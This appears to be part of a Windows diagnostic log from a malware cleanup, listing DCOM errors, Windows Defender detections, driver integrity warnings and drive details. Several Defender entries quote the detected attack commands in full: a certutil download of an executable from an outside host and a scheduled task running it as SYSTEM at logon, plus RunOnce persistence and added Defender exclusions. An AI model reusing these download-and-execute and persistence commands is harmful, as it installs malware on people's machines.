Error: (11/24/2019 07:12:07 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
to the user NT AUTHORITY\NETWORK SERVICE SID (S-1-5-20) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (11/24/2019 07:11:28 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Windows Defender:
===================================
Date: 2019-11-24 19:12:13.754
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1
Date: 2019-11-24 19:12:11.511
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1
Date: 2019-11-24 19:07:55.432
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...07&enterprise=0
Name: Trojan:Win32/Bomitag.D!ml
ID: 2147741007
Severity: Severe
Category: Trojan
Path: file:_C:\Program Files (x86)\Hadadn\68060836.exe; regkey:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z; runonce:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1
Date: 2019-11-24 19:07:39.663
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1
Date: 2019-11-24 19:07:39.626
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...51&enterprise=0
Name: BrowserModifier:Win32/Neobar
ID: 225451
Severity: High
Category: Browser Modifier
Path: regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\csrss; regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\wup; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{291DB7AE-2C1B-4863-B103-F71CA48986BA}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckIE; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckU; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckUn; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program File
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1
CodeIntegrity:
===================================
Date: 2019-10-29 09:57:25.835
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-08-03 12:16:27.456
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-07-08 12:00:17.288
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-05-04 12:47:46.475
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-03-15 11:40:11.320
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-26 12:31:13.039
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
BIOS: American Megatrends Inc. F9 10/23/2013
Motherboard: Gigabyte Technology Co., Ltd. B75-D3V
Processor: Intel® Core i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 26%
Total physical RAM: 16331.55 MB
Available physical RAM: 12012.87 MB
Total Virtual: 16631.55 MB
Available Virtual: 10766.25 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:231.78 GB) (Free:62.77 GB) NTFS
Drive d: (New BU) (Fixed) (Total:931.39 GB) (Free:152.18 GB) NTFS
Drive e: (New Volume) (Fixed) (Total:931.51 GB) (Free:64.95 GB) NTFS
Drive f: (BU) (Fixed) (Total:1863.01 GB) (Free:203.93 GB) NTFS
Drive h: (Seagate Expansion Drive) (Fixed) (Total:1863.01 GB) (Free:921.95 GB) NTFS
Drive p: () (Fixed) (Total:5 GB) (Free:0.35 GB) exFAT
\\?\Volume{00fc4e36-48f8-4543-8741-951af844353c}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{0f7535bc-bb12-4bb5-9367-1087afe3ce64}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{d3c45f89-7398-47bf-8292-fa43e6189f5c}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) FAT32
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 1F5C5EF9)
Partition: GPT.
==========================================================
Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)
Partition: GPT.
==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 0B480A61)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 00738CFB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================